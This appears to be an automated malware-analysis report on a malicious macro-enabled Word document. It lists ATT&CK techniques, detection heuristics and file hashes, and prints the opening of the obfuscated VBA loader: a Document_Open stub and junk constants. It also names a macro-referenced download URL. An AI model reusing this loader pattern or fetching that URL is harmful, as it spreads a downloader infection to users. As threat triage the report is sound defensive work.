Verdict: MALICIOUS
Risk Score: 424
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
T1566.001 Spearphishing Attachment
This OOXML document contains a VBA project with an auto-executing Document_Open macro. The macro is obfuscated and uses the Shell() function to execute a command that likely downloads and runs a second-stage payload. The presence of a VBA project, an auto-exec macro, and a Shell() call strongly indicates a malicious macro loader.
Heuristics (10)
- ClamAV: Doc.Malware.Generic-6923121-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Generic-6923121-0
- VBA project inside OOXML (medium, OOXML_VBA, 5 related findings): Document contains a VBA project (VBA macros present)
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Obfuscated VBA Shell command with URL (critical, OLE_VBA_OBFUSCATED_SHELL_URL): VBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.
- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Macro/content-enable lure (medium, SE_ENABLE_LURE): Document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All of the following URLs are referenced by macro:
  - https://a.doko.moe/pskige
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
  - http://schemas.microsoft.com/office/drawing/2014/chartex
  - http://schemas.microsoft.com/office/drawing/2015/9/8/chartex
  - http://schemas.microsoft.com/office/drawing/2015/10/21/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/9/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/10/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/11/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/12/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/13/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/14/chartex
  - http://schemas.openxmlformats.org/markup-compatibility/2006
  - http://schemas.microsoft.com/office/drawing/2016/ink
  - http://schemas.microsoft.com/office/drawing/2017/model3d
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships
  - http://schemas.openxmlformats.org/officeDocument/2006/math
  - http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main
  - http://schemas.microsoft.com/office/word/2010/wordml
  - http://schemas.microsoft.com/office/word/2012/wordml
  - http://schemas.microsoft.com/office/word/2016/wordml/cid
  - http://schemas.microsoft.com/office/word/2015/wordml/symex
  - http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
  - http://schemas.microsoft.com/office/word/2010/wordprocessingInk
  - http://schemas.microsoft.com/office/word/2006/wordml
  - http://schemas.microsoft.com/office/word/2010/wordprocessingShape
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 25313 bytes | b9eb3dfe7dd3091e24293fe9cc399c3b21fda88b5cab41fea6052e734a65f6ad |
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 70656 bytes | 55a410f76f4ddce76268b9d86ff945154661fca87e90cd18b4fd9dc76f7131fb |

Detection for macros.bas
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 22 long base64-like blob(s).

Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_Open()
WNRXI.IRPGUILKL
'JupaGdQnDvRbnekqWydT
Dim hlCflIayRFeGPXCgSHqhKxLCIedvgWUJAR
'JnuVVqomqnUYHhJErnmlkZzXHe
Dim JnuVVqomqnUYHhJErnmlkZzXHe
End Sub
Attribute VB_Name = "WNRXI"
Const HpOfnTwuLvqiNCXOzwoqykwgwJnYDnzgbMVDLiVGqIXonFgJbrwHRnnldRY = 135
Private Const trDkJtLucXYEaqAVagLyWsiidfYqYw5033 = 4
Const HBOdXwLfwnpUJYFNiDR544058045 = 86
Private Const BHpReXLlMvculmprEzdKDKReg = 8
Const YKYSpnGXKsnxcNbEBbSTowHB025492697831412603 = 4
Private Const APNRBJUHdVUWgMQDLMdYOAPLg135 = 22
Const UQwtozkDsVwIHMIvtdkYZSOYB4079652 = 8807182
Private Const emmYgNpVAqrFZAVXgPuBkkgYS62302254202 = 294866
Const vNEnAFyHfxESsMUIZwQYZKowAdl978979691 = 4079652
Private Const LlkNfyVvLbsFkTVwvOQpRphSL294866 = 544058045
Const LzyVEhKnpGZQAcCrqNZOPXUpOCjsvNOHIgutEtqS = 2
Private Const wYBJIcmBkwYFTZBPxy7942 = 1
Const DboeiOXmXysMnpFcaQCsiM2 = 98
Private Const hAAHxaDKQAbWydReAjsVjTLTE = 5
Const WYJEWSoZJcrYUgxH777290021481128 = 1
Private Const kIJFTQEJSCKygItSukqODskkQNwazvFire02 = 40
Const xLWTnGfwuVrgqzrdyYTFbnHjK2 = 542
Private Const VUImQRgFoAemjiGdTOXQdWeKO106475603216581 = 64
Const TBCfIPZEwZTFJozWQlcpyDoWFuO434623 = 2
Private Const hNHCUxlmkMjYJRDmrmSEjSGke64 = 2
Const PIyTrHNuRgHmMNIqaLlikmAPrZNqsbPhFthTOvaxtgPYcFlubXLV = 41
Private Const AZivlATNwrlxLhCrsMvmcYAVsvtc7968 = 7
Const ibRuetsxMAMtvtiaoX197826504 = 44
Private Const VgusyBXMBvCqJhidSCDspDAFP = 4
Const TChnKufMjsgfRvEYqszLw130383949766275623 = 7
Private Const jIXfdaGbZMCqGqFO41 = 36
Const tGNUvNyDnnqQCFuDaIagtrtyh104 = 272
Private Const yIEAZfeIOKTYZijtwkVJgpbYx11490061136303481 = 322
Const KMeQTkqqVPxQntSXxkrEhWSlCtT075716266 = 104
Private Const PSxiJsJSvmpTQUiMozsSpgalI322 = 197826504
Const AELYvRzXdfszEOpRnwrSVpZWKTnkzfXgCpLRLYSJqiDLE = 953
Private Const FHvOBnDZNWbXatlFxJybnhqVqLqMjbAub5912 = 5
Const uwPJudvyQJQceVELpnsqFX2165 = 57
Private Const yaFznVBcekVrpeCnDiQPUwNak = 7
Const hVIYmNCkNXeomEgEIfnj62971113301302961 = 5
Private Const aXpwqqlWhwHyoqnPUgpRhF953 = 56
Const XJctoYyVnMLZGMJtVioLOUMeE6 = 7560
Private Const wCxoPeZmmsfLxqDaMjwDEIGNQ99168504410 = 14219630
Const toIVdQiEfkZSeQZlFLdulpxXKFS7671811 = 6
Private Const fakZWUGnVTaWueAccYErToQxt14219630 = 2165
Const TSTIUQdRPLBdcMfCjWujZcMTIJIcWvbupyVqLciiSDlNrgkx = 83
Private Const oSDZEfNleWwCxjNRmIfJAuBH1544 = 5
Const IlTfYurGuTBMDMjyPyFPcFz466003030 = 80
Private Const pLGKdAoKUUbrwWeRGEKHquttw = 4
Const PLEivvKkvvrrDmJD16321732693 = 5
Private Const cxQwDYtQwFwttFFbFw83 = 50
Const hLeFgRTrRrLidVdFeGXoImBAQ0 = 2453
Private Const NrAYFZcsckTTTqMbzZLBXUlEX710818916159601 = 5
Const ngOKtCocdqEicZBbyvFPMVGqjYb5865 = 0
Private Const ynXCXzTbZfJgfKiWSTqetxQxG5 = 466003030
Const tlUXgGVJopXmRgJkUZkbmaXXdlNVVrdEXkCGJFltCjUPECxjNazj = 30
Private Const wSdYTSBTOLYHOXxHWgTP2540 = 8
Const lBhJCsSOwtutHMVLyTzepWIAdNOd9690619 = 47
Private Const sPIZCBWUYlOrUyHGWqzXssyKS = 3
Const NUksOsggpepyvwcvbADPjCaw6139608957 = 8
Private Const BxRxfLRwORZiFRRdOHLcv30 = 23
Const SQFiKdwCveFyzkoiVbgguswJG006113630 = 481
Private Const eggzYEPWVAwRCOzFiBAGWGtmT3934356492514534 = 5163
Const BCPScUCZtlMCfvzPNfSkHXzjrUK7114 = 6113630
Private Const mzqvtkTVxghqMgyBlBkThKPzY05163 = 9690619
Const LMCdxPvYvPgfMBzNcuPGYWxJeJJAQRGqoScYtExwbguuuKdt = 382
Private Const vTLsjfdPQOghUyHulwErSgXnQArIAdvpOG3465 = 3
Const eEDpPmQPxVRsemVVcSGdPvXcioUO413403993 = 57
Private Const RmAYKWDpYNSMErinCGwMGwYBQ = 4
Const RCceeyeNIgmUdBbzWEeaayjdAT406145551542081 = 3
Private Const TqTOQdpiHoECQZSyHNWfISXHdSigaG382 = 96
Const OSOFnYnycwApeduaocPFiRETD57 = 7
Private Const mFjXFUkPguGnEHYTqaEfqZpyq2686639048892 = 5
Const GwKPgbOEqZSZBzcIbvCmCUMQXhM1 = 57
Private Const qzGDtoELaXVKpXtJINNqXCHMG5 = 413403993
Public Sub IRPGUILKL()
On Error Resume Next
```
... (truncated)

Detection for vbaProject_00.bin
- ClamAV: Doc.Malware.Generic-6923121-0
- Obfuscation or payload: likely. Carved artifact contains 22 long base64-like blob(s).